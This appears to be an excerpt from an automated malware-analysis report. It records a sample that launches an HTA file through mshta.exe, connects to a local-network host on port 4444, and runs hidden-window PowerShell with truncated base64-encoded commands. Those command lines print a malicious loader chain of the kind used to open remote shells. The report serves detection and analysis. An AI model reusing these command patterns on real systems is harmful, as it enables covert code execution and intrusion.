Technical Information
- <Current directory>\artg.hta
- '<LOCALNET>.1.4':4444
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /cpowershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGEAaABEAEYATgB0AEYAcABTAFUAdQBIAGcAdwByAEkAeABuAHUAbgBwAEcAegBkAFIAQwBOAGMASABUAGwARABLAH...' (with hidden window)
- '%WINDIR%\syswow64\mshta.exe' "<Current directory>\artg.hta"
- '%WINDIR%\syswow64\cmd.exe' /cpowershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGEAaABEAEYATgB0AEYAcABTAFUAdQBIAGcAdwByAEkAeABuAHUAbgBwAEcAegBkAFIAQwBOAGMASABUAGwARABLAH...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGEAaABEAEYATgB0AEYAcABTAFUAdQBIAGcAdwByAEkAeABuAHUAbgBwAEcAegBkAFIAQwBOAGMASABUAGwARABLAHYAaQBnAFYARABUAEw...